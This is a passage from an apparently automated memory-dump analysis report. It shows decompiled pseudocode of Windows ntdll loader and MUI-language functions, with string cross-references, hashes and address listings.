                                                                      0x00ab1e08
                                                                      0x00ab1e5b
                                                                      0x00ab1e7a
                                                                      0x00ab1e7b
                                                                      0x00ab1e5d
                                                                      0x00ab1e72
                                                                      0x00ab1e77
                                                                      0x00ab1e95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 31d0a9f8ffcba6a2e571de103466ad676ada36117106fe61630af03fd94f105d
                                                                      • Instruction ID: dad89f98ce5dbd59901f591e0b05b73106b13271ac1b8bf19f581b4a82dd3229
                                                                      • Opcode Fuzzy Hash: 31d0a9f8ffcba6a2e571de103466ad676ada36117106fe61630af03fd94f105d
                                                                      • Instruction Fuzzy Hash: D561F432A54688DFC7229F95E8A5E7073F8EB44B34B59803AF9096F353D7309C519B0A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E00A03D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E00A01B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E00A01B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E00A01B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L00A14620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E00A3F3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E00A41370(_t276, 0x9d4e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E00A3BB40(0,  &_v68, _t170);
                                                                      									if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E00A3BB40(_t257,  &_v68, _t243);
                                                                      								if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E00A41370(_t278, 0x9d4e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L00A14620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E00A3F3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E00A41370(_v16, 0x9d4e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E00A3BB40(_t262,  &_v68, _t244);
                                                                      								if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E00A41370(_t282, 0x9d4e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E00A3BB40(_t262,  &_v68, _t201);
                                                                      							if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L00A14620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E00A3F3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E00A41370(_t280, 0x9d4e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E00A3BB40(_t267,  &_v68, _t245);
                                                                      							if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E00A41370(_t284, 0x9d4e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E00A3BB40(_t267,  &_v68, _t224);
                                                                      						if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}










































                                                                      0x00a03d3c
                                                                      0x00a03d42
                                                                      0x00a03d44
                                                                      0x00a03d46
                                                                      0x00a03d49
                                                                      0x00a03d4c
                                                                      0x00a03d4f
                                                                      0x00a03d52
                                                                      0x00a03d55
                                                                      0x00a03d58
                                                                      0x00a03d5b
                                                                      0x00a03d5f
                                                                      0x00a03d61
                                                                      0x00a03d66
                                                                      0x00a58213
                                                                      0x00a58218
                                                                      0x00a04085
                                                                      0x00a04088
                                                                      0x00a0408e
                                                                      0x00a04094
                                                                      0x00a0409a
                                                                      0x00a040a0
                                                                      0x00a040a6
                                                                      0x00a040a9
                                                                      0x00a040af
                                                                      0x00a040b6
                                                                      0x00a040bd
                                                                      0x00a040bd
                                                                      0x00a03d83
                                                                      0x00a5821f
                                                                      0x00a58229
                                                                      0x00a58238
                                                                      0x00a58238
                                                                      0x00a5823d
                                                                      0x00a5823d
                                                                      0x00a03da0
                                                                      0x00a03daf
                                                                      0x00a03db5
                                                                      0x00a03dba
                                                                      0x00a03dba
                                                                      0x00a03dd4
                                                                      0x00a03e94
                                                                      0x00a03eab
                                                                      0x00a03f6d
                                                                      0x00a03f84
                                                                      0x00a0406b
                                                                      0x00a0406b
                                                                      0x00a0406e
                                                                      0x00a0406e
                                                                      0x00a04070
                                                                      0x00a04074
                                                                      0x00a58351
                                                                      0x00a58351
                                                                      0x00a0407a
                                                                      0x00a0407f
                                                                      0x00a5835d
                                                                      0x00a58370
                                                                      0x00a58377
                                                                      0x00a58379
                                                                      0x00a5837c
                                                                      0x00a5837c
                                                                      0x00a5835d
                                                                      0x00000000
                                                                      0x00a0407f
                                                                      0x00a03f8a
                                                                      0x00a03f8d
                                                                      0x00a03f90
                                                                      0x00a03f95
                                                                      0x00a5830d
                                                                      0x00a5830f
                                                                      0x00a03f9b
                                                                      0x00a03fac
                                                                      0x00a03fae
                                                                      0x00a03fb1
                                                                      0x00a03fb1
                                                                      0x00a03fb6
                                                                      0x00a58317
                                                                      0x00a5831a
                                                                      0x00000000
                                                                      0x00a03fbc
                                                                      0x00a03fc1
                                                                      0x00a03fc9
                                                                      0x00a03fd7
                                                                      0x00a03fda
                                                                      0x00a03fdd
                                                                      0x00a04021
                                                                      0x00a04021
                                                                      0x00a04029
                                                                      0x00a04030
                                                                      0x00a04044
                                                                      0x00a04046
                                                                      0x00a04046
                                                                      0x00a04044
                                                                      0x00a04049
                                                                      0x00a58327
                                                                      0x00a58334
                                                                      0x00a58339
                                                                      0x00a5833c
                                                                      0x00a0404f
                                                                      0x00a0404f
                                                                      0x00a0404f
                                                                      0x00a04051
                                                                      0x00a04056
                                                                      0x00a04063
                                                                      0x00a04063
                                                                      0x00a04068
                                                                      0x00000000
                                                                      0x00a04068
                                                                      0x00a03fdf
                                                                      0x00a03fe2
                                                                      0x00a03fe4
                                                                      0x00a03fe7
                                                                      0x00a03fef
                                                                      0x00a04003
                                                                      0x00a04005
                                                                      0x00a04005
                                                                      0x00a0400c
                                                                      0x00a04013
                                                                      0x00a04016
                                                                      0x00a04017
                                                                      0x00a0401b
                                                                      0x00a0401e
                                                                      0x00000000
                                                                      0x00a0401e
                                                                      0x00a03fb6
                                                                      0x00a03eb1
                                                                      0x00a03eb4
                                                                      0x00a03eb7
                                                                      0x00a03ebc
                                                                      0x00a582a9
                                                                      0x00a582ab
                                                                      0x00a03ec2
                                                                      0x00a03ed3
                                                                      0x00a03ed5
                                                                      0x00a03ed8
                                                                      0x00a03ed8
                                                                      0x00a03edd
                                                                      0x00a582b3
                                                                      0x00a582b6
                                                                      0x00000000
                                                                      0x00a03ee3
                                                                      0x00a03ee8
                                                                      0x00a03eed
                                                                      0x00a03ef0
                                                                      0x00a03ef3
                                                                      0x00a03f02
                                                                      0x00a03f05
                                                                      0x00a03f08
                                                                      0x00a582c0
                                                                      0x00a582c3
                                                                      0x00a582c5
                                                                      0x00a582c8
                                                                      0x00a582d0
                                                                      0x00a582e4
                                                                      0x00a582e6
                                                                      0x00a582e6
                                                                      0x00a582ed
                                                                      0x00a582f4
                                                                      0x00a582f7
                                                                      0x00a582f8
                                                                      0x00a582fc
                                                                      0x00a582ff
                                                                      0x00a582ff
                                                                      0x00a03f0e
                                                                      0x00a03f11
                                                                      0x00a03f16
                                                                      0x00a03f1d
                                                                      0x00a03f31
                                                                      0x00a58307
                                                                      0x00a58307
                                                                      0x00a03f31
                                                                      0x00a03f39
                                                                      0x00a03f48
                                                                      0x00a03f4d
                                                                      0x00a03f50
                                                                      0x00a03f50
                                                                      0x00a03f53
                                                                      0x00a03f58
                                                                      0x00a03f65
                                                                      0x00a03f65
                                                                      0x00a03f6a
                                                                      0x00000000
                                                                      0x00a03f6a
                                                                      0x00a03edd
                                                                      0x00a03dda
                                                                      0x00a03ddd
                                                                      0x00a03de0
                                                                      0x00a03de5
                                                                      0x00a58245
                                                                      0x00a03deb
                                                                      0x00a03df7
                                                                      0x00a03dfc
                                                                      0x00a03dfe
                                                                      0x00a03e01
                                                                      0x00a03e01
                                                                      0x00a03e06
                                                                      0x00a5824d
                                                                      0x00a5824f
                                                                      0x00a58254
                                                                      0x00000000
                                                                      0x00a03e0c
                                                                      0x00a03e11
                                                                      0x00a03e16
                                                                      0x00a03e19
                                                                      0x00a03e29
                                                                      0x00a03e2c
                                                                      0x00a03e2f
                                                                      0x00a5825c
                                                                      0x00a5825f
                                                                      0x00a58261
                                                                      0x00a58264
                                                                      0x00a5826c
                                                                      0x00a58280
                                                                      0x00a58282
                                                                      0x00a58282
                                                                      0x00a58289
                                                                      0x00a58290
                                                                      0x00a58293
                                                                      0x00a58294
                                                                      0x00a58298
                                                                      0x00a5829b
                                                                      0x00a5829b
                                                                      0x00a03e35
                                                                      0x00a03e38
                                                                      0x00a03e3d
                                                                      0x00a03e44
                                                                      0x00a03e58
                                                                      0x00a582a3
                                                                      0x00a582a3
                                                                      0x00a03e58
                                                                      0x00a03e60
                                                                      0x00a03e6f
                                                                      0x00a03e74
                                                                      0x00a03e77
                                                                      0x00a03e77
                                                                      0x00a03e7a
                                                                      0x00a03e7f
                                                                      0x00a03e8c
                                                                      0x00a03e8c
                                                                      0x00a03e91
                                                                      0x00000000
                                                                      0x00a03e91

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 00A03F70
                                                                      • WindowsExcludedProcs, xrefs: 00A03D6F
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A03D8C
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A03E97
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A03DC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: a960a51c74b8df31cfea583a8c8ea9f3f686ce52781352ffceb7edf34dfc2ab3
                                                                      • Instruction ID: 8b708340748c21e9a843bdb8943a17c74733351dc6b631c40bacd128d4bf2ee6
                                                                      • Opcode Fuzzy Hash: a960a51c74b8df31cfea583a8c8ea9f3f686ce52781352ffceb7edf34dfc2ab3
                                                                      • Instruction Fuzzy Hash: F6F13D76D00219EBCF11DF98D981AEEBBB9FF48750F14406AE915BB251D7349E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00A28E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0xaed360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0xae8464; // 0x74790110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0xae5780 & 0x00000003) != 0) {
                                                                      							E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0xae5780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E00A3B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0xae7984; // 0x4c2b90
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0xae8464; // 0x74790110
                                                                      					 *0xaeb1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E00A29B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0xae5780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}




















                                                                      0x00a28e0f
                                                                      0x00a28e16
                                                                      0x00a28e19
                                                                      0x00a28e1b
                                                                      0x00a28e21
                                                                      0x00a28e7f
                                                                      0x00a28e85
                                                                      0x00a69354
                                                                      0x00a6936c
                                                                      0x00a69371
                                                                      0x00a6937b
                                                                      0x00a69381
                                                                      0x00a69381
                                                                      0x00a6937b
                                                                      0x00a28e9d
                                                                      0x00a28e9d
                                                                      0x00a28e29
                                                                      0x00a28e2c
                                                                      0x00a28e38
                                                                      0x00a28e3e
                                                                      0x00a28e43
                                                                      0x00a28eb5
                                                                      0x00a28eb9
                                                                      0x00a692aa
                                                                      0x00a692af
                                                                      0x00a692e8
                                                                      0x00a692e8
                                                                      0x00a692af
                                                                      0x00a28eb9
                                                                      0x00a28e45
                                                                      0x00a28e53
                                                                      0x00a28e5b
                                                                      0x00a28e5f
                                                                      0x00a28e78
                                                                      0x00a28e78
                                                                      0x00a28e7d
                                                                      0x00a28ec3
                                                                      0x00a28ecd
                                                                      0x00a28ed2
                                                                      0x00a28ed2
                                                                      0x00a28ec5
                                                                      0x00a28ec5
                                                                      0x00000000
                                                                      0x00a28e7d
                                                                      0x00a28e67
                                                                      0x00a28ea4
                                                                      0x00a6931a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a69320
                                                                      0x00a28ea4
                                                                      0x00a28e70
                                                                      0x00a69325
                                                                      0x00a69340
                                                                      0x00a69345
                                                                      0x00a69345
                                                                      0x00a28e76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpFindDllActivationContext, xrefs: 00A69331, 00A6935D
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 00A6933B, 00A69367
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 00A69357
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A6932A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 51e5fbdbeb1c41f66ef3f20cc13196e5fda0e890fd5cfa689bb7d06262e8ef32
                                                                      • Instruction ID: 23a7d526165e2d596b018550fc7ce30cdc0904479466aab9eadf0c2eacc1f463
                                                                      • Opcode Fuzzy Hash: 51e5fbdbeb1c41f66ef3f20cc13196e5fda0e890fd5cfa689bb7d06262e8ef32
                                                                      • Instruction Fuzzy Hash: 23411A32A423359FDB35AB5CFC89A7672B5AB50758F07857AF8045B1A1EF78DC808381
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00A08794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E00A0934A() != 0) {
                                                                      								_t159 = E00A7A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0xae5780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0xae5780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E00A0849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
